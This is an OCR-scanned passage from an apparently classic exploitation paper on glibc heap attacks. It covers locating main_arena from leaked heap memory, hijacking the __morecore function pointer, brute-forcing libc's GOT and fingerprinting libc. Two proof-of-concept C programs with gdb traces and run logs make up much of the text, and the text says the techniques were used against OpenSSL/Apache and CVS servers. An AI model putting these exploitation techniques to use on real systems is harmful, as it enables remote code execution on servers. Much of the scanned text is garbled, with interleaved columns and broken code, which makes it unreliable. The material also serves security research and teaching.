the process sends the content of the buffer (stored in the process’ heap) 
to the client, sending more information than the originally stored. The 
attacker obtains then a limited portion of the process heap. 


In this case, 


--] 4.5 Abusing the leaked information 
The goal of the techniques in this section is to exploit the information 
gathered using one of the process information leak tricks shown before. 


--] 4.5.1 Recognizing the arena 


The idea is to get from the previously gathered information, the address 
of a malloc’s bin. This applies mainly to scenarios were we are able to 
leak process heap memory. A bin address can be directly obtained if the 
attacker is able to use the ’freeing the output’ technique. 

The obtained bin address can be used later to find the address of a 
function pointer to overwrite with the address of our shellcode, as shown 
in the next techniques. 


Remembering how the bins are organized in memory (circular 

double linked lists), we know that a chunk hanging from any bin 
containing just one chunk will have both pointers (bk and fd) 
pointing to the head of the list, to the same address, since the list 
is circular. 


[bin_n] (first chunk) 
ptr] ----> [<- chunk ->] [<- chunk ->] [<- fd 
[ chunk 
ptr] ----> [<- chunk ->] [<- chunk ->] [<- bk 
[bin_n+t+1] (last chunk) 
[bin_X] 
ptr] ----> [<- fd 
[ lonely but interesting chunk 
ptr] ----> [<- bk 
This is really nice, as it allows us to recognize within the 
heap which address is pointing to a bin, located in libc’s space address 
more exactly, to some place in the main_arena as this head of the bin 
list is located in the main_arena. 
Then, we can look for two equal memory addresses, one next to the 
other, pointing to libc’s memory (looking for addresses of 
the form 0x4....... is enough for our purpose). We can suppose these 
pairs of addresses we found are part of a free chunk which is the only 


one hanging of a bin, 


| fd | bk 


size 


How easy is to finda 
First, this depends on 


we know it looks like... 


lonely chunk in the heap immensity? 
the exploitation scenario and the exploited process 
when exploiting the OpenSSL bug along different 


heap layout. For examp 


Ty 


6.txt Wed Apr 26 09:43:44 2017 24 


targets, we could always find at least a lonely chunk within the leaked 
heap memory. 
Second, there is another scenario in which we will be able to locate 
a malloc bin, even without the capability to find a lonely chunk. If 
we are able to find the first or last chunk of a bin, one of its 
pointers will reference an address within main_arena, while the 
other one will point to another free chunk in the process heap. So, 
we’ll be looking for pairs of valid pointers like these: 


[ ptr_2_libc’s_memory | ptr_2_process’_heap ] 
or 
[ ptr_2_process’_ heap | ptr_2_libc’s_memory ] 


We must take into account that this heuristic will not be as accurate 

as searching for a pair of equal pointers to libc’s space address, but 

as we already said, it’s possible to cross-check between multiple possible 
chunks. 

Finally, we must remember this depends totally on the way we are 

abusing the process to read its memory. In case we can read arbitrary 
addresses of memory, this is not an issue, the problem gets harder 

as more limited is our mechanism to retrieve remote memory. 


--] 4.5.2 Morecore 


Here, we show how to find a function pointer within the libc after 
obtaining a malloc bin address, using one of the before explained 
mechanisms. 


Using the size field of the retrieved chunk header and the bin_index() or 
smallbin_index() macro we obtain the exact address of the main_arena. 
We can cross check between multiple supposed lonely chunks that the 
main_arena address we obtained is the real one, depending on the 
quantity of lonely chunks pairs we’ll be more sure. As long as the 
process doesn’t crash, we may retrieve heap memory several times, as 
main_arena won’t change its location. Moreover, I think it 

wouldn’t be wrong to assume main_arena is located in the same address 
across different processes (this depends on the address on which the 
libc is mapped). This may even be true across different servers 
processes, allowing us to retrieve the main_arena through a leak ina 
process different from the one being actively exploited. 


Just 32 bytes before &main_arena[0] is located __morecore. 


Void_t *(*__morecore) () = __default_morecore; 


MORECORE() is the name of the function that is called through malloc 
code in order to obtain more memory from the operating system, it 
defaults to sbrk(). 


Void_t * __default_morecore (); 
Void_t *(*__morecore) () = __default_morecore; 
#define MORECORE (*__morecore) 


The following disassembly shows how MORECORE is called from chunk_alloc() 
code, an indirect call to __default_morecore is performed by default: 


<chunk_alloct+1468>: mov 0x64c (%ebx) , eax 
<chunk_alloct+1l474>: sub SOxc, esp 
<chunk_alloct+1477>: push sesi 
<chunk_alloct1478>: call * (eax) 


where Seax points to __default_morecore 


(gdb) x/x Seax 
0x4212df80 <__morecore>: 0x4207e034 
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(gdb) x/4i 0x4207e034 


0x4207e034 <__default_morecore>: push Sebp 

0x4207e035 <__default_morecoretl>: mov Sesp, sebp 

0x4207e037 <__default_morecoret+3>: push Sebx 

0x4207e038 <__default_morecoret4>: sub $0x10,%esp 

MORECORE() is called from the malloc() algorithm to extend the memory top, 


requesting the operating system via the sbrk. 


MORECORE() gets called twice from malloc_extend_top () 


brk = (char*) (MORECORE (sbrk_size)); 


/* Allocate correction */ 
new_brk = (char*) (MORECORE (correction) ); 


which is called by chunk_alloc(): 


/* Try to extend */ 
malloc_extend_top(ar_ptr, nb); 


Also, MORECORE is called by main_trim() and top_chunk(). 


We just need to sit and wait until the code reaches any of these points. 
In some cases it may be necessary to arrange things in order to avoid the 
code crashing before. 

The morecore function pointer is called each time the heap needs to be 
extended, so forcing the process to allocate a lot of memory is 
recommended after overwriting the pointer. 

In case we are not able to avoid a crash before taking control of the 
process, there’s no problem (unless the server dies completely), as we can 
expect the libc to be mapped in the same address in most cases. 


--] 4.5.2.1 Proof of concept 5 : Jumping with morecore 


The following code just shows to get the required information from a 
freed chunk, calculates the address of __morecore and forces a call 
to MORECORE() after having overwritten it. 


[jp@vaiolator heapy]$ ./heapy 

(-) lonely chunk was freed, gathering information... 
!) sz = 520 - bk = 0x4212E1A0 - fd = 0x4212E1A0 
') the chunk is in bin number 64 

!') &main_arena[0] @ 0x4212DFA0 

!) _ morecore @ 0x4212DF80 

(-) overwriting __morecore... 

(-) forcing a call to MORECORE()... 

Segmentation fault 


Let’s look what happened with gdb, we’1ll also be using a simple 
modified malloc in the form of a shared library to know what is 
going on inside malloc’s internal structures. 


[jp@vaiolator heapy]$ gdb heapy 

GNU gdb Red Hat Linux (5.2-2) 

Copyright 2002 Free Software Foundation, Inc. 

GDB is free software, covered by the GNU General Public License, and you are 
welcome to change it and/or distribute copies of it under certain conditions. 


Type "show copying" to see the conditions. 

There is absolutely no warranty for GDB. Type "show warranty" for details. 
This GDB was configured as "i386-redhat-linux"... 

(gdb) xr 


Starting program: /home/jp/cerebro//heapy/morecore 
(-) lonely chunk was freed, gathering information... 
(!) sz = 520 - bk = 0x4212E1A0 - fd = 0x4212E1A0 
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(!) the chunk is in bin number 64 
(!) &main_arena[0] @ 0x4212DFA0 
(!) __morecore @ 0x4212DF80 

(-) overwriting __morecore... 

(-) forcing a call to MORECORE()... 


Program received signal SIGSEGV, Segmentation fault. 
0x41414141 in ?? () 


Taking a look at the output step by step: 


First we alloc our lonely chunk: 
chunk = (unsigned int*)malloc (CHUNK_SIZE) ; 
(gdb) x/8x chunk-1 
0x80499d4: 0x00000209 0x00000000 0x00000000 0x00000000 
0x80499e4: 0x00000000 0x00000000 0x00000000 0x00000000 


Note we call malloc() again with another pointer, letting this aux 
pointer be the chunk next to the top_chunk... to avoid the 
differences in the way it is handled when freed with our purposes 
(remember in this special case the chunk would be coalesced with the 
top_chunk without getting linked to any bin): 


aux = (unsigned int*)malloc (0x0); 


[1422] MALLOC (512) - CHUNK_ALLOC (0x40019bc0, 520) 
— returning 0x8049a18 from top_chunk 
—- new top 0x8049c20 size 993 

[1422] MALLOC (0) — CHUNK_ALLOC (0x40019bc0,16) 
— returning 0x8049c20 from top_chunk 
—- new top 0x8049c30 size 977 


This is the way the heap looks like up to now... 


-—-- HEAP DUMP ---— 

ADDRESS SIZE FLAGS 
sbrk_base 0x80499f8 
chunk 0x80499f8 33(0x21) (inuse) 
chunk 0x8049a18 521(0x209) (inuse) 
chunk 0x8049c20 17(0x11) (inuse) 
chunk 0x8049c30 977(0x3d1) (top) 
sbrk_end 0x804a000 
-—-- HEAP LAYOUT --- 
|A| JA] AI [T| 
-—-- BIN DUMP --- 
ar_ptr = 0x40019bc0O - top(ar_ptr) = 0x8049c30 


No bins at all exist now, they are completely empty. 


After that we free him: 
free (chunk) ; 


5 
5 


[1422] FREE(0x8049a20) - CHUNK_FREE (0x40019bc0,0x8049a18) 
— fronlink (0x8049a18,520, 64, 0x40019dc0, 0x40019dc0) 
-— new free chunk 


(gdb) x/8x chunk-1 
0x80499d4: 0x00000209 Ox4212ela0 0x4212el1la0 0x00000000 
0x80499e4: 0Ox00000000 0x00000000 O0x00000000 0x00000000 


The chunk was freed and inserted into some bin... which was empty as 
this was the first chunk freed. So this is a ’lonely chunk’, the 
only chunk in one bin. 
Here we can see both bk and fd pointing to the same address in 
libc’s memory, let’s see how the main_arena looks like now: 
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0x4212dfa0 <main_arena>: 0x00000000 0x00010000 Ox08049be8 0x4212dfa0 
0x4212dfb0 <main_arenat16>: Ox4212dfa8 0x4212dfa8 0x4212dfbO 0x4212dfb0 
0x4212dfc0O <main_arenat+32>: Ox4212dfb8 O0x4212dfb8 O0x4212dfcO 0x4212dfc0 
0x4212dfd0 <main_arenat48>: Ox4212dfc8 O0x4212dfc8 O0x4212dfdd0 0x4212dfd0 
Ox4212dfe0 <main_arenat+64>: Ox4212dfd8 O0x4212dfd8 0x4212dfe0 0x4212dfe0 
0x4212dff0O <main_arenats80>: Ox4212dfe8 0x4212dfe8 O0x4212dffO 0x4212dff0 
0x4212e000 <main_arenat96>: Ox4212dff8 O0x4212dff8 O0x4212e000 0x4212e000 
0x4212e010 <main_arenatl112>: 0x4212e008 0x4212e008 0x4212e010 0x4212e010 
0x4212e020 <main_arenatl128>: 0x4212e018 0x4212e018 0x4212e020 0x4212e020 
0x4212e030 <main_arenatl144>: 0x4212e028 0x4212e028 0x4212e030 0x4212e030 
0x4212e180 <main_arenat480>: 0x4212e178 0x4212e178 0x4212e180 0x4212e180 
0x4212e190 <main_arenat496>: 0x4212e188 0x4212e188 0x4212e190 0x4212e190 
0x4212ela0 <main_arenat512>: 0x4212e198 0x4212e198 0x080499d0 0x080499d0 
0x4212e1b0 <main_arenat528>: 0x4212ela8 0x4212ela8 0x4212e1lb0 0x4212e1b0 
0x4212elc0O <main_arenat544>: 0x4212elb8 0x4212e1b8 0x4212elcO 0x4212el1c0 
Note the completely just initialized main_arena with all its bins 

pointing to themselves, and the just added free chunk to one of the 


bins. 2% 


(gdb) x/4x 0x4212e1a0 
0x4212ela0 <main_arenat512>: 0x4212e198 0x4212e198 0x080499d0 0x080499d0 


Also, both bin pointers refer to our lonely chunk. 
Let’s take a look at the heap in this moment: 


==> RAP DUMB S=- 


ADDRESS SIZE FLAGS 
sbrk_base 0x80499f8 
chunk Ox80499f8 33(0x21) (inuse) 
chunk 0x8049a18 521(0x209) (free) fd = 0x40019dcO | bk = 0x40019dc0 
chunk 0x8049c20 16(0x10) (inuse) 
chunk 0x8049c30 977(0x3d1) (top) 


sbrk end 0x804a000 


--- HEAP LAYOUT --~- 
[A] 164] /AI ITI 


-—-- BIN DUMP --- 
ar_ptr = 0x40019bc0O - top(ar_ptr) = 0x8049c30 
bin -> 64 (0x40019dc0) 
free_chunk 0x8049a18 - size 520 


Using the known size of the chunk, we know in which bin it was 
placed, so we can get main_arena’s address and, finally, __morecore. 


(gdb) x/16x 0x4212dfa0-0x20 

0x4212df80 <__morecore>: 0x4207e034 0x00000000 0x00000000 0x00000000 
0x4212df90 <__morecore+16>: 0x00000000 0x00000000 0x00000000 0x00000000 
0x4212dfa0 <main_arena>: 0x00000000 0x00010000 Ox08049be8 0x4212dfa0 
0x4212dfbO <main_arenat16>: Ox4212dfa8 0x4212dfa8 0x4212dfbO 0x4212dfb0 


Here, by default __morecore points to __default_morecore: 


(gdb) x/20i __morecore 


0x4207e034 <__default_morecore>: push Sebp 

0x4207e035 <__default_morecoretl>: mov Sesp, sebp 

0x4207e037 <__default_morecoret+3>: push Sebx 

0x4207e038 <__default_morecoret4>: sub $0x10,%esp 

Ox4207e03b <__default_morecoret7>: call 0x4207e030 <memalign_hook_init+64> 
0x4207e040 <__default_morecoret12>: add SOxb22cc, tebx 

0x4207e046 <__default_morecoret18>: mov 0x8 (Sebp) , Seax 

0x4207e049 <__default_morecoret21>: push Seax 


6.txt Wed Apr 26 09:43:44 2017 


O0x4207e04a <__default_morecoret+22>: call 
0x4207e04£ <__default_morecoret+27>: mov 
0x4207e052 <__default_morecore+30>: mov 
0x4207e054 <__default_morecore+32>: add 
0x4207e057 <__default_morecore+35>: xor 
0x4207e059 <__default_morecore+37>: cmp 
O0x4207e05c <__default_morecore+40>: cmovne 
Ox4207e05f <__default_morecore+43>: mov 
0x4207e061 <__default_morecoret45>: pop 
0x4207e062 <__default_morecoret+46>: ret 
0x4207e063 <__default_morecoret47>: lea 
0x4207e069 <__default_morecoret+53>: lea 


overwrit morecore with 


MOrecore: 


To conclude, w 
malloc to call 


* (unsigned int*)morecore 0x41414141; 
chunk=(unsigned int*) malloc (CHUNK_SIZE* 


[1422] MALLOC (2048) - CHUNK_ALLOC (0x40019b 
—- extending top chunk 
— previous size 976 


Program received signal SIGSEGV, Segmentat 
0x41414141 in ?? () 
(gdb) bt 
QO 0x41414141 in ?? () 
1 0x4207a148 in malloc () from /1ib/i686 
2 0x0804869d in main (argc=1, argv=Oxbff 
3 0x42017589 in libc_start_main () 
(gdb) frame 1 
1 0x4207a148 in malloc () from /1ib/i686 
(gdb) x/i Spc-0x5 
0x4207a143 <malloct+195>: call 0x4207a2 
(gdb) disass chunk_alloc 
Dump of assembler code for function chunk_ 
Ox4207a8ac <chunk_alloct1468>: mov Ox 
Ox4207a8b2 <chunk_alloct1474>: sub 
0x4207a8b5 <chunk_alloct1l477>: push se 
0x4207a8b6 <chunk_alloct1478>: call A: 


At this point we see 


(gdb) x/x Seax 


0x4212df80 <__morecore>: 0x41414141 


lude <stdio.h> 
lude <stdlib.h> 


inc 
inc 


malloc code... 
MAX_SMALLBIN 63 
MAX _SMALLBIN_SIZE 512 
SMALLBIN_WIDTH 8 
is_small_request (nb) ( (nb) 
define smallbin_index (sz) (( (unsigned 
define bin_index (sz) 

(((( (unsigned ] 
(unsigned ] 
(unsigned ] 
(unsigned 1] 
( 
( 


/* some * / 
define 
define 
define 


define 


unsigned ] 
unsigned ] 


VIN Vv 1) 10 


((( 
((( 
((( 
((( 
((( 


#define SIZE_MAS 


< MAX_SMALLBIN_SIZE 
long) (sz)) 


28 


0x4201722c <_r_debug+33569648> 


Oxfffffffc(Sebp) 
Seax, Sedx 
$0x10,%esp 

Seax, eax 
SOxffffffff, tedx 
Sedx, seax 

sebp, sesp 

sebp 


0x0 (%esi),%esi 
0x0 (Sedi,1),%edi 


a bogus address, 


4); 


c0,2056) 


ion fault. 


/libc.so.6 
ffad4) at heapy.c 


/libc.so.6 


£0 <chunk_alloc> 
alloc: 
64c (%ebx) , seax 


SOxc, esp 


si 
Seax) 


c5 


S83) 


56 + 
91 + 
110 + 
119 + 
124 + 
126) 


((( 
ee 
((( 
((( 
((( 
((( 


unsigned ] 
unsigned ] 
unsigned ] 
unsigned ] 
unsigned ] 
unsigned ] 


, seDx 


and force 


£5Z 


from /lib/i686/libc.so.6 


chunk_alloc trying to jump to __morecore 


—- SMALLBIN_WIDTH) 


>> 
>> 
>> 
>> 
>> 
>> 


PRR 


oun O DW 


BO LE OE EO EE 
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#define CHUNK_SIZE 0x200 


int main(int argc, char *argv[]) { 


unsigned int *chunk, *aux,sz,bk,fd,bin, arena,morecore; 


chunk = (unsigned int*)malloc (CHUNK_SIZE) ; 

aux = (unsigned int*)malloc (0x0); 

free (chunk) ; 

printf("(-) lonely chunk was freed, gathering information...\n"); 
sz = chunk[-1] & ~SIZE_MASK; 

fd = chunk[0]; 

bk = chunk[1]; 

if (obk==fd) printf("\t(!) sz = Su - bk = Ox%X - fd = 0x%X\n",sz,bk,fd); 
else printf("\t(X) bk != fd ...\n"),exit(-1); 

bin = is_small_request (sz)? smallbin_index(sz) : bin_index(sz); 
printf("\t(!) the chunk is in bin number %d\n",bin); 

arena = bk-bin*2*sizeof (void*); 

printf("\t(!) &main_arena[0] @ 0x%X\n",arena) ; 

morecore = arena-32; 

printf ("\t(!) __morecore @ 0x%X\n",morecore) ; 

printf("(-) overwriting __morecore...\n"); 

* (unsigned int*)morecore = 0x41414141; 

printf("(-) forcing a call to MORECORE()...\n"); 

chunk=(unsigned int*) malloc (CHUNK_SIZE*4) ; 


return 7; 


} 


This technique works even when the process is loaded in a randomized 
address space, as the address of the function pointer is gathered in 
runtime from the targeted process. The mechanism is fully generic, as 

every process linked to the glibc can be exploited this way. 

Also, no bruteforcing is needed, as just one try is enough to exploit the 
process. 

On the other hand, this technique is not longer useful in newer libcs, 

i.e. 2.2.93, a for the changed suffered by malloc code. A new approach 

is suggested later to help in exploitation of these libc versions. 

Morecore idea was successfully tested on different glibc versions and Linux 
distributions default installs: Debian 2.2r0, Mandrake 8.1, Mandrake 

8.2, Redhat 6.1, Redhat 6.2, Redhat 7.0, Redhat 7.2, Redhat 7.3 and 
Slackware 2.2.19 (libc-2.2.3.s0). 

Exploit code using this trick is able to exploit the vulnerable 
OpenSSL/Apache servers without any hardcoded addresses in at least the 
above mentioned default distributions. 


--] 4.5.3 Libe’s GOT bruteforcing 


In case the morecore trick doesn’t work (we can try, as just requires 
one try), meaning probably that our target is using a newer libc, we 
still have the obtained glibc’s bin address. We know that above that 
address is going to be located the glibc’s GOT. 

We just need to bruteforce upwards until hitting any entry of a going to 
be called libc function. This bruteforce mechanism may take a while, but 
not more time that should be needed to bruteforce the main object’s GOT 
(in case we obtained its aproximate location some way). 

To speed up the process, the bruteforcing start point should be obtained 
by adjusting the retrieved bin address with a fixed value. This value 
should be enough to avoid corrupting the arena to prevent crashing the 
process. Also, the bruteforcing can be performed using a step size bigger 
than one. Using a higher step value will need a less tries, but may miss 
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the GOT. The step size should be calculated considering the GOT size and 
the number of GOT entries accesses between each try (if a higher number 

of GOT entries are used, it’s higher the probability of modifying an entry 
that’s going to be accessed). 

After each try, it is important to force the server to perform as many 
actions as possible, in order to make it call lots of different libc 

calls so the probability of using the GOT entry that was overwritten 

is higher. 


Note the bruteforcing mechanism may crash the process in several ways, as 
it is corrupting libc data. 


As we obtained the address in runtime, we can be sure we are bruteforcing 
the right place, even if the target is randomizing the process/lib address 
space, and that we will end hitting some GOT entry. 

In a randomized load address scenario, we’ll need to hit a GOT entry 
before the process crashes to exploit the obtained bin address if there 
is no relationship between the load addresses in the crashed process (the 
one we obtained the bin address from) and the new process handling our 
new requests (i.e. forked processes may inherit father’s memory layout in 
some randomization implementations). However, the bruteforcing mechanism 
can take into account the already tried offsets once it has obtained the 
new bin address, as the relative offset between the bin and the GOT is 
constant. 


Moreover, this technique applies to any process linked to the glibc. 

Note that we could be able to exploit a server bruteforcing some specific 
function pointers (i.e. located in some structures such as network output 
buffers), but these approach is more generic. 


The libc’s GOT bruteforcing idea was successfully tested in Redhat 8.0, 
Redhat 7.2 and Redhat 7.1 default installations. 

Exploit code bruteforcing libc’s GOT is able to exploit the vulnerable 
CVS servers without any hardcoded addresses in at least the above 
mentioned default distributions. 


--] 4.5.3.1 Proof of concept 6 : Hinted libc’s GOT bruteforcing 


The following code bruteforces itself. The process tries to find himself, 
to finally end in an useless endless loop. 

include <stdio.h> 

include <fcntl.h> 

define ADJUST 0x200 

define STEP Ox2 

define LOOP_SC "\xeb\xfe" 

define LOOP_SZ 2 

define SC_SZ 512 

define OUTPUT_SZ 64 * 1024 

define SOMEOFFSET (x) 11 + (rand() % ((x)-1-11)) 

define SOMECHUNKSZ 32 + (rand() % 512) 

define PREV_INUSE 1 

define IS_MMAP 2 

define NON_MAIN_ARENA 4 
unsigned long *aa4bmoPrimitive (unsigned long what, unsigned long 


where,unsigned long sz) { 
unsigned long *unlinkMe; 
int i=0; 


if (sz<13) sz = 13; 
unlinkMe=(unsigned long*)malloc(sz*sizeof (unsigned long)); 
unlinkMe [i++] 4; 
unlinkMe [i++] 4; 
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unlinkMe [i 4; 
unlinkMe [i what; 
unlinkMe [i where-8; 
unlinkMe [i 4; 
unlinkMe [i 4; 
unlinkMe [i 4; 
unlinkMe [i what; 
unlinkMe [i where-8; 
for(;i<sz;itt) 
if (i%2) 
unlinkMe[i] = ((-(i-8) * 4) & ~(IS_MMAP|NON_MAIN_ARENA)) | PREV_INUSE; 
else 
unlinkMe[i] = ((-(i-3) * 4) & ~(IS_MMAP|NON_MAIN_ARENA)) | PREV_INUSE; 


free (unlinkMe+SOMEOFFSET (sz) ); 
return unlinkMe; 


/* just force some libc function calls between each bruteforcing iteration */ 
void do_little (void) { 
int w,X; 
char buf [256]; 
sleep (0); 
w = open("/dev/null",O_WRONLY) ; 
r = open("/dev/urandom",O_RDONLY) ; 
read(r,buf, sizeof (buf) ); 
write(w,buf, sizeof (buf) ); 
close(r); 
close (w); 
return; 


} 


int main(int argc, char **argv) { 
unsigned long *output, *bin=0; 
unsigned long i=0,sz; 
char *~“sG;-*p; 
unsigned long *start=0; 


printf ("\n## HINTED LIBC GOT BRUTEFORCING Poc ##\n\n") ; 


sc = (char*) malloc(SC_SZ * LOOP_SZ); 
printf("(-) %Sd bytes shellcode @ %p\n",SC_SZ,sc); 
p= sc; 


for (p=sc; p+tLOOP_SZ<sc+SC_SZ;p+=LOOP_SZ) 
memcpy (p, LOOP_SC, LOOP_SZ) ; 


printf("(-) forcing bin address disclosure... "); 
output = aa4bmoPrimitive (Oxbfffffc0, 0Oxbfffffc4,OUTPUT_SZ) ; 
for (i=0; i<OUTPUT_SZ-1; i++) 


if(output[i] == output[itl] && 
((output[i] & Oxffff0000) != OxffffO000) ) f{ 
bin = (unsigned long*) output [i]; 


printf ("%p\n",bin); 
start = bin —- ADJUST; 
} 
if ('!bin) { 
printf ("failed\n") ; 
return 0; 


} 


if(argv[1]) i = strtoll(argv[1], (char **)NULL,0); 
else i = 0; 
printf("(-) starting libc GOT bruteforcing @ %p\n",start); 


for(;;it+) { 
sz = SOMECHUNKSZ; 
printf(" try #%.2d writing %p at %p using %6d bytes chunk\n", 
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i,sc,start-(i*ST 


32 


EP),s*sizeof (unsigned long)); 


aa4bmoPrimitive((unsigned long)sc, (unsigned long) (start-—(i*STEP)),sz); 
do_little(); 


} 


printf("I’m not here, 


} 


Let’s see what happens: 


$ ./got_bf 
## HINT! 


(-) 512 bytes shel 


ED LIBC GOT 


this is not happening\n"); 


BRUTEFORCING PoC ## 


Llcode @ 0x8049cb0 


(-) forcing bin address disclosure... 
(-) starting libc GOT bruteforcing @ 0x4212a9dc 
0x4212a9dc 


try 


try 
try 


try 
try 
try 


try 


try 


try 


00 
O1 
02 
03 
04 
05 


140 
141 
142 


writing 
writing 
writing 
writing 
writing 
writing 


0x8049cb0 
0x8049cb0 
0x8049cb0 
0x8049cb0 
0x8049cb0 
0x8049cb0 


at 
at 
at 
at 
at 
at 


0x4212bldc 


0x4212a9d4 
0x4212a9cc 
0x4212a9c4 
0x4212a9bc 
0x4212a9b4 


using 
using 
using 
using 
using 
using 


writing 0x8049cb0 at 0x4212a57c using 
writing 0x8049cb0 at 0x4212a574 using 
writing 0x8049cb0 at 0x4212a56c using 
Segmentation fault 


194 
58 
114 
107 
94 
183 


DONWaO As 


bytes 
bytes 
bytes 
bytes 
bytes 
bytes 


chunk 


chun 


chunk 


chun 


chunk 


chun 


1416 bytes chu 
152 bytes chu 
332 bytes chu 


K 


K 


We obtained 142 consecutive tries without crashing using random sized 


chunks. 


We run our code again, 
note the program gets the bas 


$ ./got_bf 143 


## HINT! 
(-) 512 bytes shel 


(-) starting libc 


try 
try 


try 
try 


try 
try 


try 


try 


try 


try 


try 


ED LIBC GOT 


writing 
writing 
writing 
writing 
writing 
writing 
writing 
writing 
writing 
writing 
writing 


Segmentation fault 


bruteforcing address again. 


BRUTEFORCING PoC ## 


llcode @ 


0x804 
0x804 
0x804 
0x804 
0x804 
0x804 
0x804 
0x804 
0x804 
0x804 


0x804 


It crashed much faster... 
reached the GOT... 


$ ./got_bf 154 


## HINT! 


(-) 512 bytes shel 


ED LIBC GOT 


0x8049cb0 
(-) forcing bin address disclosure... 


9cbO 
9cbO 
9cb0 
9cbO 
9cb0 
9cbO 
9cb0 
9cbO 
9cbh0 
9cbO 
9cbO 


at 
at 
at 
at 
at 
at 
at 
at 
at 
at 
at 


GOT bruteforcing @ 


0x4 
0x4 
0x4 
0x4 
0x4 
0x4 
0x4 
0x4 
0x4 
0x4 
0x4 


NNNNNNNNDN DN LY 


probably we 


0x4212bldc 
Ox4212a9dc 
12a564 using 
12a55c using 
12a554 using 
12a54c using 
12a544 using 
12a53c using 
12a534 using 
12a52c using 
12a524 using 
12a5lc using 
12a514 using 
corru 


BRUTEFORCING PoC ## 


Llcode @ 0x8049cb0 


(-) forcing bin address disclosure... 
(-) starting libc GOT bruteforcing @ 0x4212a9dc 


try #154 
Segmentation fault 


pted some libc data, 


0x4212bldc 


writing 0x8049cb0 at 0x4212a50c using 


$ ./got_bf 155 


1944 
588 
1148 
1072 
948 
1836 
1132 
1432 

904 
2144 
2080 


bytes 
bytes 
bytes 
bytes 
bytes 
bytes 
bytes 
bytes 
bytes 
bytes 
bytes 


chu 
chu 
chu 
chu 
chu 
chu 
chu 
chu 
chu 
chu 
chu 


a) 


orl es SAS: pos ot 
NNNNNN NA 


starting from try number 143 this time, 


aw 


w 


or we have 


1944 bytes chunk 


6.txt Wed Apr 26 09:43:44 2017 33 
## HINTED LIBC GOT BRUTEFORCING PoC ## 


(-) 512 bytes shellcode @ 0x8049cb0 

(-) forcing bin address disclosure... 0x4212bldc 

(-) starting libc GOT bruteforcing @ 0x4212a9dc 
try #155 writing 0x8049cb0 at 0x4212a504 using 1944 bytes chunk 
try #156 writing 0x8049cb0 at 0x4212a4fc using 588 bytes chunk 
try #157 writing 0x8049cb0O at 0x4212a4f4 using 1148 bytes chunk 

Segmentation fault 


$ ./got_bf 158 


## HINTED LIBC GOT BRUTEFORCING PoC ## 


(-) 512 bytes shellcode @ 0x8049cb0 
(-) forcing bin address disclosure... 0x4212bldc 
(-) starting libc GOT bruteforcing @ 0x4212a9dc 
try #158 writing 0x8049cb0 at 0x4212a4ec using 1944 bytes chunk 


try #179 writing 0x8049cb0 at 0x4212a444 using 1244 bytes chunk 
Segmentation fault 


$ ./got_bf 180 


## HINTED LIBC GOT BRUTEFORCING PoC ## 


(-) 512 bytes shellcode @ 0x8049cb0 

(-) forcing bin address disclosure... 0x4212bldc 

(-) starting libc GOT bruteforcing @ 0x4212a9dc 
try #180 writing 0x8049cb0 at 0x4212a43c using 1944 bytes chunk 
try #181 writing 0x8049cb0 at 0x4212a434 using 588 bytes chunk 
try #182 writing 0x8049cb0 at 0x4212a42c using 1148 bytes chunk 
try #183 writing 0x8049cb0 at 0x4212a424 using 1072 bytes chunk 

Segmentation fault 


$ ./got_bf 183 


## HINTED LIBC GOT BRUTEFORCING PoC ## 


(-) 512 bytes shellcode @ 0x8049cb0 

(-) forcing bin address disclosure... 0x4212bldc 

(-) starting libc GOT bruteforcing @ 0x4212a9dc 
try #183 writing 0x8049cb0 at 0x4212a424 using 1944 bytes chunk 
try #184 writing 0x8049cb0 at 0x4212a41c using 588 bytes chunk 
try #185 writing 0x8049cb0 at 0x4212a414 using 1148 bytes chunk 
try #186 writing 0x8049cb0 at 0x4212a40c using 1072 bytes chunk 
try #187 writing 0x8049cb0 at 0x4212a404 using 948 bytes chunk 
try #188 writing 0x8049cb0 at 0x4212a3fc using 1836 bytes chunk 
try #189 writing 0x8049cb0 at 0x4212a3f4 using 1132 bytes chunk 
try #190 writing 0x8049cb0 at 0x4212a3ec using 1432 bytes chunk 

Finally, the loop shellcode gets executed... 5 crashes were needed, 

stepping 8 bytes each time. Playing with the STEP and the ADJUST values 

and the do_little() function will yield different results. 


--] 4.5.4 Libe fingerprinting 


Having a bin address allows us to recognize the libc version being 
attacked. 
We just need to build a database with different libcs from different 
distributions to match the obtained bin address and bin number. 

Knowing exactly which is the libc the target process has loaded gives us 
the exact absolute address of any location within libc, such as: 
function pointers, internal structures, flags, etc. This information can 
be abused to build several attacks in different scenarios, i.e. knowing 
the location of functions and strings allows to easily craft return into 
libe attacks [14]. 
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Besides, knowing the libc version enables us to know which Linux 
distribution is running the target host. These could allow further 
exploitation in case we are not able to exploit the bug (the one we are 
using to leak the bin address) to execute code. 


--] 4.5.5 Arena corruption (top, last remainder and bin modification) 


From the previously gathered main_arena address, we know the location of 
any bin, including the top chunk and the last reminder chunk. 
Corrupting any of this pointers will completely modify the allocator 
behavior. Right now, I don’t have any code to confirm this, but there are 
lot of possibilities open for research here, as an attacker might be 

able to redirect a whole bin into his own supplied input. 


--] 4.6 Copying the shellcode ‘by hand’ 


Other trick that allows the attacker to know the exact location of the 
injected shellcode, is copying the shellcode to a fixed address using the 
aad4bmo primitive. 
As we can’t write any value, using unaligned writes is needed to create 
the shellcode in memory, writting 1 or 2 bytes each time. 

We need to be able to copy the whole shellcode before the server crashes 
in order to use this technique. 


-—-] 5 Conclusions 


malloc based vulnerabilities provide a huge opportunity for fully 
automated exploitation. 
The ability to transform the aa4bmo primitive into memory leak primitives 
allows the attacker to exploit processes without any prior knowledge, even 
in presence of memory layout randomization schemes. 


[ Note by editors: It came to our attention that the described 
technique might not work for the glibc 2.3 serie. ] 
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Appendix I - malloc internal structures overview 


This appendix contains a brief overview about some details of malloc 
inner workings we need to have in mind in order to fully understand most 


of the techniques explained in t 


his paper. 


Free consolidated ’chunks’ 
circular double-linked lists, 
with the heap layout. The circul 
for us, as we’ll s later on. 


A 'bin’ is a pair of pointers fr 
exist 128 (#define NAV 128) bins 
bins’. 
composed of not the same size ch 


arity of these 


om where these 
, which may be 


Small bins contain equally sized chunks, 
ordered by decreasing size. 


unks, 


define MAX _SMALLBIN 63 
define MAX _SMALLBIN_SIZE 512 
define SMALLBIN_ WIDTH 8 
define is_small_request (nb) ((n 
define smallbin_index (sz) (((u 
define bin_index (sz) 

(((( (unsigned long) (sz)) >> 9) = 
((( (unsigned long) (sz)) >> 9) < 
((( (unsigned long) (sz)) >> 9) < 
((( (unsigned long) (sz)) >> 9) < 
((( (unsigned long) (sz)) >> 9) < 
((( (unsigned long) (sz)) >> 9) < 


From source documentation we kno 
